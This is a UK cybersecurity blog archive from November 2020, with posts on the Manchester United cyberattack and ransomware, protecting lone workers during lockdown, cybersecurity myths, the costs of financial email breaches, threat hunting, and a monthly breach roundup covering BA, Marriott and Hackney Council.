Monday 30 November 2020

The Multi-Million Pound Manchester United Hack

Earlier this year I wrote a blog post about the Manchester City Billion Pound Hack, which explored cyberattacks within elite football. Now it is the turn of City big rivals Manchester United, after they reported their IT systems had been impacted by a cyber-attack, widely reported in the UK media as a cyber-extortion attack.

In the last couple of years, cybercriminals have significantly ramped up efforts in targeting UK businesses with cyber extortion attacks, using ransomware malware and confidential data theft to leverage their victims into paying large ransom payments anonymously in Bitcoin. Many businesses have been quick to pay out ransoms after their operations ground to halt due to their IT systems being rendered unusable due to ransomware, and also to avoid dumping their confidential data on the internet by the cybercriminals.  

In July 2020 the UK National Cyber Security Centre (NCSC) specially warned that cybercriminals were targeting UK sports teams with ransomware attacks in a report. This NCSC report cited a ransomware attack against an unnamed English Football League club, which crippled their  IT systems to the extent it stopped their turnstiles from working and almost led to the cancellation of the league fixture, which would have cost the club hundreds of thousands of pounds in lost income. NCSC reported it suspected cyber attackers gained access to the football club's network either by a phishing email or by remote access system connected to the club's CCTV system. That access was used to spread ransomware across the entire football club IT network.  It is understood the cybercriminals behind the attack demanded 400 bitcoin (over £300,000), which was not paid.  It seems Manchester United have been targeted similarly

In a statement on 20th November 2020, Manchester United stated, 

'Manchester United can confirm that the club has experienced a cyber attack on its systems. The club has taken swift actions to contain the attack and is currently working with expert advisers to investigate the incident and minimize the ongoing IT disruption.

Although this is a sophisticated operation by organized cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this risk. Our cyber defenses identified the attack and shut down affected systems to contain the damage and protect data.'

Despite the assurances in the statement the cyber-attack does appear to be contained and recovered from as yet, as both the Daily Mirror and the Daily Mail reported on 28th and 29th November 2020 respectively, that hackers had accessed the clubs scouting system's 'confidential information on targets and scouting missions'.  Several UK newspapers also reported the club's email system remains disabled.

As yet, no details have been released about the cyberattack ingress method, the malware used or the suspected perpetrators behind the attack, when asked for details Man Utd stated 'The club will not be commenting on speculation regarding who may have been responsible for this attack or the motives behind it.'  Without any details of the cyberattack released by the club or leaked, at this stage it's difficult to draw any conclusions, but we can speculate.  

The likely suspect is a variant of the Ryuk ransomware, possibly orchestrated by Ryuk criminal group, together with the recently reported resurgence of the Emote trojan last month, Emote is a common dropper of ransomware. It was a new variant of the Ryuk ransomware that was behind a cyberattack on digital services firm Sopra Steria in October 2020. Another common ransomware culprit is Trickbot, however, Microsoft and their partners took action last month to disrupt Trickbot botnet.

No details have been released on how much this incident is costing Manchester United nor the ransom fee being demanded.  The media have speculated the ransom fee to be in the millions, likely based on that recent NCSC report, which stated an EFL club faced a £5 million ransom from cyber attackers.

If this attack is found to have breached Manchester United fans data protection rights under the UK Data Protection Act (GDPR), the club could face a fine of up to £18m or 2% of their total annual worldwide turnover by the UK Information Commissioner's Office.  Further, given Manchester United are listed on New York Stock Exchange, the club could face additional US legislation if they decide to pay the ransomware fee, that fine could be up to £15m ($20m).

The US Office of Foreign Assets Control (OFAC) warned that paying the ransom demand would only boost the criminals’ finances and encourage them to strike again elsewhere, stating, 

‘Facilitating a ransomware payment that is demanded as a result of malicious cyber activities may enable criminals and adversaries with a sanctions nexus to profit and advance their illicit aims.

Ransomware payments may also embolden cyber actors to engage in future attacks'

The last sentence of the OFAC statement is an essential point, given many organisations are giving in to cyber-extortion demands and paying up, it is fuelling further attacks.  

If it was made illegal in the UK to pay a cyber extortion payment, that law would both remove the temptation of giving up on recovery and paying ransoms, but also push UK organisations into investing and deploying the appropriate level of cybersecurity controls to counter the risk, as there are simple security controls which can adequately thwart the risk of successful ransomware and data theft attacks. The simple truth is most ransomware and data theft attacks aren't really 'sophisticated', successful attacks can be prevented applying security control basics, such as continually patching IT systems (esp. internet-facing remote access VPN appliances), deploying and keeping anti-virus up-to-date, blocking external suspicious emails, and ensuring staff have a good level of security awareness, particularly in their ability to spotting phishing emails.

Without pushing down global criminal threat actors 'Reward Vs Effort' reasoning, we can expect to see further high-profile businesses like Manchester United targeted with cyber extortion attacks, which ultimately causes significant reputational and financial damage on their organisation.

Tuesday 24 November 2020

Advice: Protecting Lone Workers Through Covid Restrictions

Protecting lone workers is an issue that businesses may not have come across previously, especially those based in busy city centre office blocks pre-coronavirus. Yet with many thriving business districts deserted through a lockdown and not everyone able to work from home, it’s an issue more management teams are having to consider. 
 Firms could be inadvertently putting employees at risk of security, mental health/wellbeing and medical risk
Here, Jonathan Fell of digital security provider Digital ID, outlines some of the ways to protect members of staff who find themselves lone working during lockdown number two.

“Most businesses have got to grips with the challenges around managing teams remotely, but what about the needs of those employees who can’t or won’t work from home. In the following Government guidelines, firms could be inadvertently putting employees who need to stay office-based at risk in other areas – security, mental health/wellbeing and medical suitability being just a few of the potential causes for concern.

“Even if there are a small number of employees in the workplace you should still put procedures in place for times in the day when workers will be alone for example lunchbreaks and variations in contracted hours.”

Security and Access Control
“Security is one of the main concerns,” said Jonathan. “Ensuring that staff members are not put into dangerous situations in the workplace. Don’t forget, empty offices could be a potential target for robberies, leaving staff on their own more vulnerable to theft. Your lone worker will need briefing and support on how to identify and report threats. 

Empty offices are targets for robberies, lone office workers need support on dealing with such threats

“An update to the security system will be needed to reflect who is coming in and out of the building. In terms of ID cards that means making sure your policies are updated to include new procedures relating to lone workers and the building.

“Someone should be appointed to monitor the login records to ensure staff arrive and leave at the expected times – luckily that’s easy to do remotely with a digital ID card system. If your current access control system doesn’t allow you to do this, you should really think about upgrading your system.”

Find out more about this over on the Digital ID blog: https://www.digitalid.co.uk/blog/to-upgrade-or-not-to-upgrade-why-2020-is-the-time-to-migrate-your-access-control-system

“Having someone on call and close enough to respond in an emergency is another important consideration. A tip here is to print emergency contact details onto the reverse of their ID or access cards. Given that these should be kept on the person at all times, it means contact numbers easy to find and use if a person needs help quickly.

“Things like checking your employee has good mobile phone coverage in the place of work is something a lot of people don’t think about but is very important these days. If they don’t, then they’ll need an active landline within easy access.

“If photo ID is connected to an access control system, you may need to restrict access to some of the building in light of any new changes. Think about where needs to be accessed and how frequently by the lone worker, perhaps moving some things around within the building to ensure they can stick to a smaller footprint that will put them less at risk.

“A final thought on security is that coming in and leaving at exactly the same time every day carrying laptops or other equipment could make them a target for personal theft, this needs to be weighed up against travelling at times when it’s dark and isolated. All should be covered in a full risk assessment.

“It’s worth remembering that as a business you’re responsible for workers lone working at home too, so where there will not be complicated access concerns here, looking after the mental health and wellbeing of your team should remain a priority. As well as making sure they know what to do in a medical emergency”.

Digital ID is the UK’s largest ID card company offering a complete service. For 25 years the organisation has to help businesses and their employees stay secure. It provides a range of products and services including plastic ID card printing, ID card printers and lanyards tailored to meet the requirements of its customers. Find out more at www.digitalid.co.uk

Monday 23 November 2020

Seven Debunked Myths of Cybersecurity

Article by Kristin Herman, a writer and editor at Ukwritings.com and Academized.com

The term 'cybersecurity' has been tossed around lately. But although cybersecurity has been viewed as a saving grace for mobile devices, computers, etc. the topic is still cloaked in misconception. Things that might pop up, when it comes to cybersecurity, are:
  • The idea of security
  • Password strength
  • Who cybersecurity threats target and affect
  • If insurance will cover damages
  • How effective an IT team actually is
  • Cybersecurity “costs”
  • What devices are most vulnerable to malware?
However, as one side says one thing, while the other side contests it, it’s easy to get caught up in believing the wrong things. In fact, a lot of people get it all wrong. So, to understand the truth about cybersecurity, then check out this quick guide, which will cover seven of the most debunked myths about the subject matter:

1. “Physical Security and Cybersecurity are Two Different Things”
“The truth is, physical security is not separate from cybersecurity,” says Angela Macquarie, a business writer at Academized and Oxessays. “Both can help safeguard machines and paper documents. And, while both can function online and offline, the things they protect will hold sensitive data, which can be at risk of being exposed if the owner or holder is not careful.”

2. “Having a Good Password Protects You”
When it comes to passwords, you can leave anything to chance. And even as weak passwords are still commonplace, it’s hard to imagine many people using passwords like “123456” or “qwerty,” especially after being warned not to do so. Therefore, it’s imperative to complicate your passwords – make it difficult for other people to figure out. And, always update your passwords, so that you can be one step ahead of cybercriminals every time.

3. “Cybercriminals only Attack Large Businesses”
Wrong. Cybercriminals will go after any type of business – big or small. Since cyber thieves don’t discriminate, it’s important to keep your devices and data safe with an effective cybersecurity framework, regardless of the size of a business.

4. “Insurance will cover Cybersecurity Breaches”
Wrong again. In actuality, most insurance policies won’t cover businesses in the event of a data breach. While some policies might cover financial losses that have transpired from it, most policies won’t.

So, when shopping around for business-related insurance, make sure that policies will be able to compensate you whenever the dreaded breach springs up at any time. Or, you can buy insurance and cybersecurity separately. Purchasing cyber and data insurance will be worth the investment if you’re looking to protect customer and or sensitive data from infiltration.

5. “The IT Team has you Covered”
Think that IT teams can save your business, whenever data breaches happen? Think again!

While IT staff will most likely know about potential vulnerabilities and hacker techniques, they still can’t control all the elements involved. Your IT staff, instead, will only act as a human firewall to prevent breaches that stem from human error. Therefore, make it your job to add more layers of protection, besides your IT team.

6. “Cybersecurity is Costly”
“When people think about cybersecurity, they assume that investing in it will cost hundreds, or thousands, of dollars,” says Sheila Flynn, a marketing blogger at Boom Essays and Paper Fellows. “However, having a strong human firewall to defend you against cybercrime is entirely free – apart from creating an IT security policy and training staff. Investment can go a long way, as cybersecurity will greatly benefit your business.”

As such, consider consulting a cybersecurity expert, or look into comprehensive training and advice from cybersecurity experts, to help you put together an effective system that will protect all of your devices and data.

7. “Viruses only affect Desktops”
As technology continues to evolve – especially with more advanced smartphones and tablets working in almost the same capacity as computers – viruses aren’t just a computer thing. In fact, smartphones, tablets, and other mobile devices can fall victim to malware, if the user doesn’t have enough protection for them. And although it only took Internet access for malware to get to computers, other devices that connect to the Internet are still just as vulnerable to viruses.

Conclusion
As you read through these seven debunked myths, we hope that you have a better understanding of cybersecurity. The ultimate goal of this guide is to keep you – the device user – informed. By learning how cybercriminals work, and learning the truth about today’s debunked myths, you’ll learn from the mistakes that you might be making now with your devices, and fix them right away.

About the Author: Kristin Herman is a writer and editor at Ukwritings.com and Stateofwriting.com. She is also a contributing writer for online publications, such as Essayroo.com. As a marketing writer, she blogs about the latest trends in online advertising and social media influencing.

Monday 16 November 2020

Check, Please! Adding up the Costs of a Financial Data Breach

Guest article by Andrea Babbs, UK General Manager at VIPRE

Reliance on email as a fundamental function of business communication has been in place for some time. But as remote working has become a key factor for the majority of business during 2020, it’s arguably more important than ever as a communication tool. The fact that roughly 206.4 billion emails are sent and received each day means we’re all very familiar with that dreaded feeling of sending an email with typos, with the wrong attachment, or to the wrong contact. But this can be more than just an embarrassing mistake – the ramifications could, in fact, be catastrophic. 
Check Please! Within the financial services, layered cybersecurity strategy is essential to keep sensitive information secure
In particular, for the financial services industry that deals with highly sensitive information including monetary transactions and financial data, the consequences of this information falling into the wrong hands could mean the loss of significant sums of money. Emails of this nature are the Holy Grail for cybercriminals. So how can financial services organisations keep their confidential information secure to safeguard their data and reputation? 

How much?
According to research from Ponemon Institute in its Cost of a Data Breach Report 2020, organisations spend an average of $3.85 million recovering from security incidents, with the usual time to identify and contain a breach being 280 days. Accenture’s 2019 Ninth Annual Cost of Cybercrime found that financial services incurred the highest cybercrime costs of all industries. And while examples of external threats seem to make the headlines, such the Capital One cyber incident, unintentional or insider breaches don’t always garner as much attention. Yet they are both as dangerous as each other. In fact, human errors (including misdeliveries via email) are almost twice as likely to result in confirmed data disclosure.

Costs will be wide-ranging depending on the scale of each breach, but at a minimum, there will be financial penalties, costs for audits to understand why the incident happened and what additional protocols and solutions need to be implemented to prevent it from happening in the future. There could also be huge costs involved for reimbursing customers who may have been affected by the breach in turn.

Priceless damage
The fallout from data breaches goes far beyond that of financial penalties and costs. Financial services businesses have reputations to uphold in order to maintain a loyal customer base. Those that fail to protect their customers’ sensitive information will have to manage the negative press and mistrust from existing and potential customers that could seriously impede the organisation as a whole. Within such a highly competitive market, it doesn’t take much for customers to take their money elsewhere – customer service and reputation is everything.

Check, please!
Within the financial services sector, the stakes are high, so an effective, layered cybersecurity strategy is essential to mitigate risk and keep sensitive information secure. With this, there are three critical components that must be considered: 
  1. Authentication and encryption: Hackers may try to attack systems directly or intercept emails via an insecure transport link. Security protocols are designed to prevent most instances of unauthorised interception, content modification and email spoofing. Adding a dedicated email to email encryption service to your email security arsenal increases your protection in this area. Encryption and authentication, however, do not safeguard you against human errors and misdeliveries. 
  2. Policies and training: Security guidelines and rules regarding the circulation and storage of sensitive financial information are essential, as well as clear steps to follow when a security incident happens. Employees must undergo cybersecurity awareness training when they join the organisation and then be enrolled in an ongoing programme with quarterly or monthly short, informative sessions. This training should also incorporate ongoing phishing simulations, as well as simulated phishing attacks to demonstrate to users how these incidents can appear, and educate them on how to spot and flag them accordingly. Moreover, automated phishing simulations can also provide key metrics and reports on how users are improving in their training. This reinforcement of the secure messaging, working in tandem with simulated phishing attacks ensures that everyone is capable of spotting a phishing scam or knows how to handle sensitive information as they are aware and reminded regularly of the risks involved. 
  3. Data loss prevention (DLP): DLP solutions enable the firm to implement security measures for the detection, control and prevention of risky email sending behaviours. Fully technical solutions such as machine learning can go so far to prevent breaches, but it is only the human element that can truly decipher between what is safe to send, and what is not. In practice, machine learning will either stop everything from being sent – becoming more of a nuisance than support to users – or it will stop nothing. Rather than disabling time-saving features such as autocomplete to prevent employees from becoming complacent when it comes to selecting the right email recipient, DLP solutions do not impede the working practices of users but instead give them a critical second chance to double-check.
It is this double-check that can be the critical factor in an organisation’s cybersecurity efforts. Users can be prompted based on several parameters that can be specified. For example, colleagues in different departments exchanging confidential documents with each other and external suppliers means that the TO and CC fields are likely to have multiple recipients in them. A simple incorrect email address or a cleverly disguised spoofed email cropping up with emails going back and forth is likely to be missed without a tool in place to highlight this to the user, to give them a chance to double-check the accuracy of email recipients and the contents of attachments.

Conclusion
Email remains a risky, yet essential tool for every business. But with a layered security strategy in place consisting of training, authentication tools and DLP solutions, organisations can minimise the risks involved and take a proactive approach to their cyber defences.

Given the nature of the industry, financial services organisations are a prime target for cybercriminals. The temptation of personal information and financial transactions for hackers is never going to dwindle, so financial institutions must prioritise cybersecurity, regularly assessing risks, deploying innovative, human-led solutions and educating workforces to provide the best defence possible.

Tuesday 10 November 2020

One Step Beyond: Using Threat Hunting to Anticipate the Unknown

Article by Paul German, CEO, Certes Networks

A cyber threat could be lurking in any corner of an organisation’s infrastructure. The complex networks encompassing numerous smart and interconnected technologies make it easy for cybercriminals to hide, but much harder for them to be found.

Yet, waiting for a cyber threat to make an appearance is far too dangerous; if left undetected, a cybercriminal could stay in an organisation’s network for years - and just think of the damage that could be caused. To combat this, threat hunting is now an essential component of any cybersecurity strategy. Rather than waiting for a hacker to make themselves known, threat hunting involves constantly and proactively searching for the threats hiding within a system, working on the assumption that a cyber hacker is ever-present and looking for signs of unusual activity before it even occurs.

But how does threat hunting work in practice, and how can the approach ensure an organisation’s data is kept safe? Why a proactive approach to cybersecurity is essential at a time when the threat has never been more severe.
 Anticipating the unknown is the only way to stay ahead of hackers

The Need for Observability 
Today’s networks are complex, presenting numerous places for a cyber hacker to hide. And unfortunately, it’s not uncommon for infiltrations to go undetected in networks for days, weeks or months. In fact, a recent report shows that it takes organisations an average of 280 days to identify and contain a data breach, but organisations can’t afford to wait this long. In this time, a cyber hacker can be travelling through the network, infiltrating systems and stealing information, making an organisation’s data increasingly vulnerable.

And the length of time can even be longer than this; in the 2018 Marriott International data breach, hackers were accessing the network for over four years before they were discovered, which resulted in the records of 339 million guests being exposed. The hotel chain then suffered a second data breach this year after cybercriminals had been in the network for over one month, impacting approximately 5.2 million guests.

So, what needs to change? It is now more important than ever for organisations to be able to analyse contextual data in order to make informed decisions regarding their network security policy. This is not possible without 24/7/365 managed detection and response (MDR) tools for proactive threat hunting that uses event monitoring logs, automated use case data, contextual analysis, incident alerting and response and applying tactics, techniques and procedures (TTPs) to identify issues that improve an organisation’s security posture.

Anticipating the Unknown
When anticipating the unknown, cybersecurity analytics tools can capture data and detect evasive and malicious activity, wherever they are in the network in real-time. Generating fine-grained policies and enforcing these is one step security teams can take to proactively detect and remediate malicious activity immediately. With policy enforcement, attackers will have a hard time attempting to make lateral ‘east-west’ movements or remaining hidden in any part of the network, as the security team will be able to see inside the network and protect against threats across all attack surfaces across all manged endpoints with a unified multi-layer approach. This includes policy generation and enforcement MDR tools that can provide greater insight into the overall reliability, impact and success of network systems, their workload and their behaviour to identify threats and proactively respond and protect assets. 

In reality, this means that security teams can take measurable steps towards controlling system access of the network environment; knowing who is in the network, who should be able to access what data and which applications, and being the first to detect indicators of compromise (IOC).

Ahead of the Game
Threat hunting is a way to stay one step ahead of cybercriminals. Organisations no longer have to wait to be alerted of a data breach before taking action; today it is essential to have a complete picture of the entire network in real-time, including extending these capabilities to teleworkers, so that unusual activity can be identified and halted immediately before any damage occurs. With strong MDR tools at the core, organisations can ensure a strong and effective security posture based on anticipating the unknown, clear visibility into vulnerabilities that pose the biggest threat and identifying barriers that prevent successful tracking and remediation.

Wednesday 4 November 2020

Cyber Security Roundup for November 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, October 2020.

London's Hackney Borough Council has been tight-lipped about "a serious cyber-attack" which took down its IT systems, impacting its service delivery to citizens. Providing scant information about the attack, but it does have all the hallmarks of a ransomware outbreak. The council says it is working with the UK's National Cyber Security Centre (NCSC) and the Ministry of Housing to investigate and understand the impact of the incident. Ransomware attacks continue to be a major blight for UK public services, with councils to hospitals struggling to defend their IT systems against ransomware. Earlier this year Redcar and Cleveland Borough Council said it had been hit by a ransomware attack, which cost it more than £10m.

It looks like the ransomware will continue to pose a major threat to the UK for some time to come, with separate reports advising a resurgence in the Emotet trojan, a common dropper of ransomware, while the hacking group behind the notorious Ryuk ransomware has been reported as being active again. A new variant of the Ryuk ransomware was behind a cyberattack on Sopra Steria’s operations in October 2020, the digital services company confirmed.

British Airways had it credit card breach DPA fine cut by a massive £163m to £20m by the UK Information Commissioner's Office (ICO), which imposed the original fine after the now pandemic financially beleaguered airline lost 430,000 payment card details to hackers after an e-commence skimming attack in 2018

 BA lost 430,000 payment card details to hackers after Magecart e-commence skimming attack in 2018
This data breach was a lesson in failing at PCI DSS compliance, with customer credit card details stolen due to ‘Magecart’ payment card skimming script being injected onto the BA payment page. The attackers initially compromised the BA network through a third-party worker’s remote access (not MFA protected), gaining access to BA's Citrix environment. Once inside the BA network, the attackers were gifted privilege level access after finding a domain admin account username and password in plaintext on a server folder. I understand investigators found the storage of payment cards in plaintext, including CVV numbers post-payment authorisation which is never permitted under PCI DSS rules. Aside from the ICO fine and reputational damage, this breach cost is likely to have cost BA a small fortune in specialised PCI PFI digital investigation forensic work, a complete solution rebuild, and with card brand penalties. The Visa Chief Enterprise Risk Officer once said ‘no compromised entity has yet been found to be in compliance with PCI DSS at the time of a breach’, I understand that statement still rings true today.

The ICO didn't hold back in dishing a massive DPA (GDPR) fine to the Marriott Hotels chain to the tune of £18.4m after a major data breach which affected up to 7 million UK guests. The ICO reported UK citizen names, contact information, and passport details were compromised in the cyber-attack. The ICO also said the company failed to put appropriate safeguards in place but acknowledged it had improved.

Meanwhile, the UK NCSC released an advisory which repeated an earlier United States warning that Chinese Threat Actors are exploiting well-known software vulnerabilities. The advisory details 25 top vulnerabilities that are being exploited whilst offering mitigation advice. Many of the vulnerabilities allow attackers to gain access to a victim’s network by exploiting products directly connected to the internet. The NSA has also produced a nice infographic breaking the 25 vulnerabilities down by threat.


Stay safe and secure.

BLOG

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE